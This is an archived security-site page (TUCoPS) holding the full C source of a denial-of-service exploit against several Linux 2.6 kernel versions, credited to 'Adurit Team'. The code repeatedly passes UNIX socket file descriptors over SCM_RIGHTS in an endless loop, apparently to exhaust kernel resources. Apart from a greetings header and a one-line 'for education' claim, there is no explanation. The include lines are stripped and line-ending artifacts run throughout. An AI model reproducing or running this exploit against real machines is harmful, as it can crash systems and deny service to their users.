TUCoPS :: Linux :: General :: va2195.htm

Linux Kernel 2.6.18/2.6.24/2.6.20/2.6.22/2.6.21 denial of service exploit
Linux Kernel 2.6.18/2.6.24/2.6.20/2.6.22/2.6.21 denial of service exploit
Linux Kernel 2.6.18/2.6.24/2.6.20/2.6.22/2.6.21 denial of service exploit


/*=0D
Linux Kernel 2.6.18/2.6.24/2.6.20/2.6.22/2.6.21 denial of service exploit=0D
=0D
Author : Adurit Team=0D
         >> djekmani4ever=0D
=0D
Home : www.hightsec.com=0D 
=0D
greetz : adurit team - v4-team - Zigma - stack - Mr.safa7 - king sabri - alphanix - and all my friends=0D
=0D
note : this code for education :)=0D
*/=0D
=0D
#include =0D
#include =0D
#include =0D
#include =0D
#include =0D
#include =0D
=0D
static int own_child(int *us)=0D
{=0D
        int pid;=0D
        int s[2];=0D
        struct msghdr mh;=0D
        char crap[1024];=0D
        struct iovec iov;=0D
        struct cmsghdr *c;=0D
        int *fd;=0D
        int rc;=0D
=0D
        pid = fork();=0D
        if (pid == -1)=0D
                err(1, "fork()");=0D
=0D
        if (pid) {=0D
              close(us[1]);=0D
=0D
                return pid;=0D
        }=0D
=0D
        close(us[0]);=0D
=0D
        memset(&mh, 0, sizeof(mh));=0D
        iov.iov_base = "a";=0D
        iov.iov_len  = 1;=0D
=0D
        mh.msg_iov        = &iov;=0D
        mh.msg_iovlen     = 1;=0D
        mh.msg_control    = crap;=0D
        mh.msg_controllen = sizeof(crap);=0D
=0D
        c = CMSG_FIRSTHDR(&mh);=0D
        assert(c);=0D
=0D
        c->cmsg_level = SOL_SOCKET;=0D
        c->cmsg_type  = SCM_RIGHTS;=0D
=0D
        fd = (int*) CMSG_DATA(c);=0D
        assert(fd);=0D
=0D
        c->cmsg_len = CMSG_LEN(sizeof(int));=0D
        mh.msg_controllen = c->cmsg_len;=0D
=0D
        while (1) {=0D
                if (socketpair(PF_UNIX, SOCK_STREAM, 0, s) == -1)=0D
                        err(1, "socketpair()");=0D
=0D
                *fd = s[0];=0D
=0D
                rc = sendmsg(us[1], &mh, 0);=0D
                if (rc == -1)=0D
                        err(1, "sendmsg()");=0D
=0D
                if (rc != iov.iov_len)=0D
                        errx(1, "sent short");=0D
=0D
                close(s[0]);=0D
                close(us[1]);=0D
                us[1] = s[1];=0D
        }=0D
}=0D
=0D
static void own(void)=0D
{       =0D
        static int pid;=0D
        static int us[2];=0D
        char crap[1024];=0D
        char morte[1024];=0D
        struct cmsghdr *c;=0D
        int rc;=0D
        struct msghdr mh;=0D
        struct iovec iov;=0D
        int *fds;=0D
=0D
        if (!pid) {=0D
                if (socketpair(PF_UNIX, SOCK_STREAM, 0, us) == -1)=0D
                        err(1, "socketpair()");=0D
                pid = own_child(us);=0D
        }=0D
=0D
        iov.iov_base = morte;=0D
        iov.iov_len  = sizeof(morte);=0D
=0D
        memset(&mh, 0, sizeof(mh));=0D
        mh.msg_iov        = &iov;=0D
        mh.msg_iovlen     = 1;=0D
        mh.msg_control    = crap;=0D
        mh.msg_controllen = sizeof(crap);=0D
=0D
        rc = recvmsg(us[0], &mh, 0);=0D
        if (rc == -1)=0D
                err(1, "recvmsg()");=0D
=0D
        if (rc == 0)=0D
                errx(1, "EOF");=0D
=0D
        c = CMSG_FIRSTHDR(&mh);=0D
        assert(c);=0D
        assert(c->cmsg_type == SCM_RIGHTS);=0D
=0D
        fds = (int*) CMSG_DATA(c);=0D
        assert(fds);=0D
=0D
        close(us[0]);=0D
        us[0] = *fds;=0D
}=0D
=0D
int main(int argc, char *argv[])=0D
{=0D
	own();=0D
	exit(0);=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH